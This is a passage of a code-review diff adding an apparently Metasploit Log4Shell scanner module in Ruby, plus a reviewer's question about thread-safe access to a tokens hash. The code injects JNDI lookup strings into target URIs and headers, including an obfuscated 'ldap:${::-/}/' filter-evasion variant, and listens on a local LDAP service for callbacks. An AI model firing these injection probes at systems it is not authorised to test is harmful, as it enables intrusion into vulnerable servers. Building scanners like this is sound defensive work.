modules/auxiliary/scanner/http/log4shell_scanner.rb

```diff
@@ -0,0 +1,193 @@
+      report_vuln(
+        host: context[:rhost],
+        port: context[:rport],
+        info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
+        name: name,
+        refs: references
+      )
+    end
+  rescue Net::LDAP::PDU::Error => e
+    vprint_error("#{peer} - #{e}")
+  ensure
+    service.close_client(client)
+  end
+
+  def rand_text_alpha_lower_numeric(len, bad = '')
+    foo = []
+    foo += ('a'..'z').to_a
+    foo += ('0'..'9').to_a
+    Rex::Text.rand_base(len, bad, *foo)
+  end
+
+  def run
+    fail_with(Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])
+    @tokens = {}
+    # always disable SSL because the LDAP server doesn't use it but the setting is shared with the HTTP requests
+    begin
+      start_service('SSL' => false)
+    rescue Rex::BindFailed => e
+      fail_with(Failure::BadConfig, e.to_s)
+    end
+
+    super
+
+    vprint_status("Sleeping #{datastore['TIMEOUT']} seconds for any last connections")
+    sleep datastore['TIMEOUT']
+  ensure
+    stop_service
+  end
+
+  def replicant
+    # don't duplicate the service
+    service = @service
+    @service = nil
+    obj = super
+    @service = service
+
+    # but do duplicate the mutable tokens hash
+    obj.tokens = tokens
+    obj
+  end
+
+  def run_host(ip)
+    # probe the target before continuing
+    return if send_request_cgi('uri' => normalize_uri(target_uri)).nil?
+
+    run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?
+
+    return if datastore['URIS_FILE'].blank?
+
+    File.open(datastore['URIS_FILE'], 'rb').each_line do |uri|
+      uri.strip!
+      next if uri.start_with?('#')
+
+      if uri.include?('${jndi:uri}')
+        token = rand_text_alpha_lower_numeric(8..32)
+        jndi = jndi_string(token)
+        uri.delete_prefix!('/')
+        test(token, uri: normalize_uri(target_uri, '') + uri.gsub('${jndi:uri}', Rex::Text.uri_encode(jndi)))
+      else
+        run_host_uri(ip, normalize_uri(target_uri, uri))
+      end
+    end
+  end
+
+  def run_host_uri(_ip, uri)
+    unless datastore['HEADERS_FILE'].blank?
+      headers_file = File.open(datastore['HEADERS_FILE'], 'rb')
+      headers_file.each_line do |header|
+        header.strip!
+        next if header.start_with?('#')
+
+        token = rand_text_alpha_lower_numeric(8..32)
+        test(token, uri: uri, headers: { header => jndi_string(token) })
+      end
+    end
+
+    token = rand_text_alpha_lower_numeric(8..32)
+    jndi = jndi_string(token)
+    test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/')), '/'))
+
+    token = rand_text_alpha_lower_numeric(8..32)
+    jndi = jndi_string(token)
+    test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/'))))
+  end
+
+  def test(token, uri: nil, headers: nil)
+    @tokens[token] = {
```

Comment:
Does this need to have its access synchronised when working across multiple threads? 👀